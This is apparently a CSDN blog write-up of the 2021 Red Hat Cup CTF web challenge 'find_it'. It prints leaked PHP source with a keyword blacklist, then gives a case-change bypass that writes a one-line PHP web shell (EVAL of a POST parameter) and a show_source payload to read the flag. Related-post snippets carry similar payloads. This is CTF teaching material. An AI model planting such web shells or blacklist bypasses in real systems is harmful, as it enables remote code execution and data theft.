2021-第四届红帽杯网络安全大赛-Web-find_it

最新推荐文章于 2024-09-24 07:29:36 发布
最新推荐文章于 2024-09-24 07:29:36 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: CTFWP 文章标签: php 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53863234/article/details/121630422
版权

通过御剑扫描到了robots.txt
在这里插入图片描述

提示有一个1ndexx.php,尝试访问,但访问不了,返回404,访问.1ndexx.php.swp得到源码

<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

不知道它这个正则替换的什么鬼,竟然没有禁用大小写,直接传值

?code=<?php EVAL($_POST['cmd']); ?>

然后访问hack.php,直接上蚁剑
在web目录发现flag
在这里插入图片描述

还有一种解法直接读hack.php的内容,通过这几句代码

$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

flag.php的内容已经写入到hack.php中。那就可以直接读取hack.php拿到flag,这里没被禁用的有
show_source,当然禁用的也可以使用大小写绕过。

?code=<?php show_source(__FILE__); ?>

访问hack.php,也可以直接拿到flag。

早川秋zcq
关注
专栏目录
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛 - 线上赛 Writeup 第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛-
2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
05-03
2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
2021-第四届红帽杯网络安全大赛-find_it | 先备份文件、然代码审计、后正则绕过
一醉一休的博客
09-24 945
小小记录一下
2021-第四届红帽杯网络安全大赛-find_it
atm1111的博客
01-05 476
这里是用get方法传值给a,然后判断a中是否含有黑名单中的内容,如果不含有,就将a的内容写入到文件hack.php中。因此,这里我们可以将php一句话木马写入到hack.php中,然后用蚁剑连接即可得到flag。访问robots.txt,发现还存在一个1ndexx.php,但是无法直接访问。于是怀疑这里存在备份文件泄露。访问.1ndexx.php.swp得到源码。使用御剑进行目录扫描,得到存在robots.txt。
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
weixin_40872714的博客
03-26 1658
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注、SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登录框 查看源码,发现可能的注入点 /image.php?id=2 布尔盲注 /image.php?id=if(1=1,1,5) True /image.php?id=if(1=2,1,5) False 条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可
攻防大赛网络安全心得体会_第二届红帽杯网络安全攻防大赛总结会在省公安厅召开_详细网安笔记
2401_84915584的博客
06-02 315
第二届红帽杯网络安全攻防大赛总结会在省公安厅召开5月31日下午,第二届红帽杯网络安全攻防大赛总结会在广东省公安厅主楼9楼会议室召开。
红帽杯2021web Find_it
qq_52671379的博客
06-14 331
Find_it 打开题目链接并没有任何收获 然后想想有无备份文件 最后通过dirsearch.py扫描发现robots.txt 发现存在1ndexx.php,直接访问并没有什么信息。 同样的猜测是否存在备份文件 常见的备份文件后扩展名有 .git .svn .swp .~ .bak .bash_history .svn 最后查看.swp备份文件得到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <
第三届“红帽杯网络安全攻防大赛总决赛落幕.pdf
09-20
第三届“红帽杯网络安全攻防大赛总决赛落幕.pdf
18--[小红帽].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-18
18--[小红帽].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码18--[小红帽].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码18--[小红帽].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码18...
rhel-server-7.1-x86-64-dvd.iso文件
02-03
rhel-server-7.1-x86_64-dvd.iso文件
2018红帽杯线上预选赛wp---Web
wkend的博客
05-05 610
1. simple upload 首先使用弱口令登录试试,页面没啥变化,设置代理,Burp Suite抓包 发现cookieadmin=0,将其值改为1,跳转到新页面, 编辑php一句话,保存为jpg图片上传, 在Burp Suite中修改文件名为1.php, 可以上传,但是发现并不解析 尝试了asp,aspx,jsp,发现jsp可以执行,重新上传jsp即...
CTF中备份文件泄露
gou1791241251的博客
10-19 2462
通常题目给出的一下提示路径时,可能直接访问会得不到想要的结果,或者直接是404. 此时可以尝试扫一下备份文件,常见备份文件.swp结尾 例题:2021-第四届红帽杯网络安全大赛-Web-find_it
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
Anton__1的博客
05-12 2922
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他办法咯 <?php #Really easy... $file=fopen("flag.php","r") or die("Unable 2 open!"); $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize(
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9990
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
软希网分享源码的博客
09-23 481
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
PHP中error_reporting函数作用
最新发布
sheji888的专栏
09-24 735
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
红帽6.6如何修复cve-2016-2183漏洞
09-15
CVE-2016-2183是一个安全漏洞,影响了红帽6.6版本中的内核。要修复这个漏洞,通常需要打上相应的安全补丁。以下是修复这个漏洞的一般步骤,但请注意,这些步骤可能需要根据您的具体系统配置和环境进行适当调整: 1....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值